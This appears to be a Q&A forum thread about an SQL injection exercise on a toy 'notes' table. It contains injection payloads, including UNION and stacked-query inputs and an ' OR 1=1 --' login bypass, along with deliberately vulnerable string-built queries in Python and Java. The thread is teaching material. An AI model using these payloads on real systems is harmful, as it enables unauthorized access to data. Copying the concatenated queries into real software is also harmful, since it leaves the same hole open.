# How to implement SQL injection

Tags: sql, sql-injection

Suppose you have the following SQL Query to create a table called notes and store data in it :

```
CREATE TABLE notes (
id INTEGER PRIMARY KEY,
username TEXT,
token TEXT,
text TEXT
);
INSERT INTO notes (username, token, text) VALUES ('alice', 'token-a', 'Reminder: buy milk');
INSERT INTO notes (username, token, text) VALUES ('alice', 'token-a', 'I like Bob');
INSERT INTO notes (username, token, text) VALUES ('bob', 'token-b', 'TODO: write tests');
```

Now to attempt SQL injection to get all alice's notes without knowing her token where the query to get the data is given as :

```
'''SELECT text
          FROM notes
         WHERE token = '%s'
    ''' % token
```

What should be the text send in the variable token so as to perform SQL injection and get all alice's notes.

Answer (score 0):

Try Something like this-

```
';SELECT text
          FROM notes
         WHERE username = 'alice
```

Comment: I tried it like this ' UNION SELECT text FROM notes WHERE username='alice  but the problem is that i want the output to be in revere order , could you help me out with that

Comment: what do you mean by reverse order here?

Comment: the output coming out is this ___  [('I like Bob',), ('Reminder: buy milk',)]
Whereas it should be this ___  [('Reminder: buy milk',), ('I like Bob',)]

Comment: try using ```order by``` clause

Answer (score -1):

SQL Injection can be implemented by concatenating the SQL statement with the input parameters. For example, the following statement is vulnerable to SQL Injection:

```
 String statement = "SELECT ID FROM USERS WHERE USERNAME = '" + inputUsername + "' AND PASSWORD = '" + hashedPassword + "'";
```

An attacker would enter a username like this:

```
 ' OR 1=1 Limit 1; --
```

Thus, the executed statement will be:

```
 SELECT ID FROM USERS WHERE USERNAME = '' OR 1=1 Limit 1; --' AND PASSWORD = 'Blob'
```

Hence, the password part is commented, and the database engine would return any arbitrary result which will be acceptable by the application.

I found this nice explanation on the free preview of "Introduction to Cybersecurity for Software Developers" course.

https://www.udemy.com/course/cybersecurity-for-developers-1/

It also explains how to prevent SQL Injection.